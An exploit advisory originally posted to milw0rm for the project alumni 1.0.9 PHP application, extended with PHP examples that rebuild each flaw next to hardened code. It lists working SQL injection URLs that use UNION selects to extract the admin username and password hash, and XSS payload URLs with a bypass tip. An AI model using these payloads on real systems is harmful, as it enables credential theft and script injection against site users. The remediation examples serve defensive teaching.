project alumni 1.0.9 Remote XSS SQL Injection Vulnerability

project-alumni sql injection & xss
author : tomplixsee
tomplixsee@yahoo.co.id

---------------------------------------------------------------------------------------------------------
affected software version       : project alumni v1.0.9 (v1.0.8 and earlier probably affected too, untested)
download                        : https://sourceforge.net/projects/project-alumni/
   8
   9
vulnerability
=============

1. sql injection
++++++++++++++++
condition: magic_quotes_gpc = off (with it on, the single quote in the payload is backslash-escaped and the injection fails)

vulnerable code in view.page.inc.php:
$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `alumniYear` = '".$_GET['year']."'");

reason: $_GET['year'] is concatenated into the query string with no escaping or validation
exploit (assumes the configured sqlTablePrefix is alumni, so the users table is alumni_users; the UNION lists 19 values to match that table's column count, and the trailing where ID='1 selects the admin row while soaking up the closing quote the code appends):
http://victim/path/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1
  23
result example:
+------------------------------------------------------+----------------+
|      Name                                            |     Email      |
+------------------------------------------------------+----------------+
|      tomplixsee (1) f25a2fc72690b780b2a14e140ef6a9e0 |  Not Available |
+------------------------------------------------------+----------------+
tomplixsee is the admin's username and f25a2fc72690b780b2a14e140ef6a9e0 is the MD5 hash of the admin's password, both rendered where the page expects a name.
  31
  32
vulnerable code in news.page.inc.php:
$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_class_news` WHERE `year` = '".$_GET['year']."'");

reason: the same unescaped concatenation of $_GET['year']
exploit (this table has 9 columns, so the UNION lists 9 values):
http://victim/path/index.php?act=news&year=2003' union select 1,2,3,4,5,6,alumniPassword,8,9 from alumni_users where ID='1
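
Both queries above have the same defect, so one added example (my code, not project-alumni's) covers them: the view.page.inc.php pattern rebuilt in PHP against an in-memory SQLite table through PDO, first concatenated exactly as the advisory shows it, then with the year validated and bound as a parameter. The table, its two rows and its 4-column shape are constructed stand-ins for alumni_users (the real table has 19 columns, which is why the advisory's UNION lists 19 values and this one lists 4); the hashes are placeholder sample data.

```php
<?php
// Added example, not project-alumni code: the advisory's concatenated query
// reproduced against an in-memory SQLite table via PDO, beside a hardened form.
// alumni_users here is a constructed 4-column stand-in (the real table has 19
// columns, so the advisory's UNION lists 19 values; this one lists 4).

function makeDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE alumni_users (
        ID INTEGER PRIMARY KEY,
        alumniUserName TEXT,
        alumniPassword TEXT,   -- md5 hex, as in the advisory's result table
        alumniYear TEXT)");
    // Constructed sample rows; the hashes are placeholders, not real credentials.
    $db->exec("INSERT INTO alumni_users VALUES
        (1, 'admin', 'f25a2fc72690b780b2a14e140ef6a9e0', '1999'),
        (2, 'alice', 'd41d8cd98f00b204e9800998ecf8427e', '2003')");
    return $db;
}

// The advisory's pattern: the raw year dropped straight into the SQL string.
function vulnerableLookup(PDO $db, string $year): array {
    $sql = "SELECT * FROM `alumni_users` WHERE `alumniYear` = '" . $year . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened: only a four-digit year is accepted, and it reaches the database
// as a bound parameter, never as part of the SQL text.
function safeLookup(PDO $db, string $year): array {
    if (!preg_match('/^\d{4}$/', $year)) {
        throw new InvalidArgumentException("year must be four digits, got: $year");
    }
    $stmt = $db->prepare("SELECT * FROM `alumni_users` WHERE `alumniYear` = ?");
    $stmt->execute([$year]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

$db = makeDb();
// Same shape as the advisory's payload, cut to this table's 4 columns. The
// trailing  where ID='1  soaks up the closing quote the code appends.
$payload = "2003' union select 1,alumniUserName,alumniPassword,1 from alumni_users where ID='1";

echo "vulnerable query:\n";
foreach (vulnerableLookup($db, $payload) as $row) {
    echo '  ', implode(' | ', $row), "\n";
}

echo "hardened query:\n";
try {
    safeLookup($db, $payload);
} catch (InvalidArgumentException $e) {
    echo '  rejected: ', $e->getMessage(), "\n";
}
echo '  ', count(safeLookup($db, '2003')), " row(s) for year 2003\n";
```

Run it with `php sqli.php` (needs the bundled pdo_sqlite driver). The vulnerable loop prints alice's row and then the UNION row carrying admin's username and hash; the hardened call throws before any SQL is assembled, and a genuine year still returns its rows. The same prepare/execute replaces the news.page.inc.php query with only the table and column names changed.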
  39
2. xss
++++++
reason: $_GET['year'] is echoed into the page without html encoding

vulnerable code in /xml/index.php:

<?php
if(isset($_GET["year"])){
        $year = $_GET["year"];
}
if($year=='FRND')
        $yearText = "Friends of ".getConfigVal("schoolAbbr",2)." Alumni";
else
        $yearText = "Class of $year";
?>
.....
<?php echo"$yearText";?>
.....

exploit:
http://victim/path/xml/index.php?year=<xss>

vulnerable code in view.page.inc.php:

<?php if(!$_GET['year']) { ?>
....
<?php } else if ($_GET['year'] < getConfigVal("alumniStartYear",2)) { ?>
....
<?php } else { ?>
<h2>Alumni for the Graduating Year of <?php echo $_GET['year'] ?></h2>

exploit:
http://victim/path/index.php?act=view&year=<xss>

note: the `<` check is a loose comparison. On the PHP 5 of the time a value that does not start with digits converts to 0, so a bare <xss> falls into the "before alumniStartYear" branch; give the payload a leading year (year=2003<xss>) to reach the <h2>. The same parameter also feeds the sql query in section 1, so a payload without a single quote leaves that query intact.
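
An added example in PHP (my code, not project-alumni's) covering both echo sites above: each is rebuilt as a function next to a hardened version that validates the year and encodes the output with htmlspecialchars. Assumptions: schoolAbbr is 'ACME', alumniStartYear is 1990, the bodies of the branches the advisory elides are placeholders, and the three inputs are constructed test values standing in for $_GET['year'].

```php
<?php
// Added example, not project-alumni code: the two echo sites from the advisory
// as functions, each beside a hardened version. Assumed values: schoolAbbr
// 'ACME', alumniStartYear 1990; the elided branch bodies are placeholders.

const SCHOOL_ABBR = 'ACME';

function enc(string $s): string {
    // Encode for an HTML text context; ENT_QUOTES also covers attribute use.
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// /xml/index.php as the advisory shows it: $year interpolated raw.
function yearTextVulnerable(?string $year): string {
    if ($year == 'FRND') {
        return "Friends of " . SCHOOL_ABBR . " Alumni";
    }
    return "Class of $year";
}

// Hardened: accept only the two shapes the page needs, and encode on output.
function yearTextSafe(?string $year): string {
    if ($year === 'FRND') {
        return "Friends of " . enc(SCHOOL_ABBR) . " Alumni";
    }
    if ($year === null || !preg_match('/^\d{4}$/', $year)) {
        return "Class of (unknown year)";
    }
    return "Class of " . enc($year);
}

// view.page.inc.php's heading as in the advisory. The loose `<` is why a
// bare <xss> payload may miss the <h2>: on PHP 5 a string without leading
// digits compares as 0 and lands in the "too early" branch.
function headingVulnerable(?string $year, int $startYear): string {
    if (!$year) {
        return "<p>pick a year</p>";
    } elseif ($year < $startYear) {
        return "<p>no classes before $startYear</p>";
    }
    return "<h2>Alumni for the Graduating Year of $year</h2>";
}

// Hardened: validate to an integer first, compare as integers, encode on output.
function headingSafe(?string $year, int $startYear): string {
    if ($year === null || !preg_match('/^\d{4}$/', $year)) {
        return "<p>pick a year</p>";
    }
    $y = (int) $year;
    if ($y < $startYear) {
        return "<p>no classes before " . enc((string) $startYear) . "</p>";
    }
    return "<h2>Alumni for the Graduating Year of " . enc((string) $y) . "</h2>";
}

// Constructed inputs standing in for $_GET['year'].
$inputs = ['2003', '<script>alert(1)</script>', '2003<script>alert(1)</script>'];
foreach ($inputs as $in) {
    echo "input: $in\n";
    echo "  xml  raw : ", yearTextVulnerable($in), "\n";
    echo "  xml  safe: ", yearTextSafe($in), "\n";
    echo "  view raw : ", headingVulnerable($in, 1990), "\n";
    echo "  view safe: ", headingSafe($in, 1990), "\n";
}
```

Run it with `php xss.php`. The raw functions hand the script tags back untouched (on PHP 5 the bare payload lands in the "too early" branch of the heading; the one with a leading year reaches the <h2> everywhere), while the hardened ones either refuse the input or return it as `&lt;script&gt;...`. For a field that must be a year the validation alone would already close the hole; encoding at the echo is the habit that also covers the next field that is free text.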
  75
  76
greetings to:
the sukabirus network kids, friends at stt telkom, the jasakom community,
sibalbal, crutz_ao, bidulux, akillers 179...........

# milw0rm.com [2007-11-24]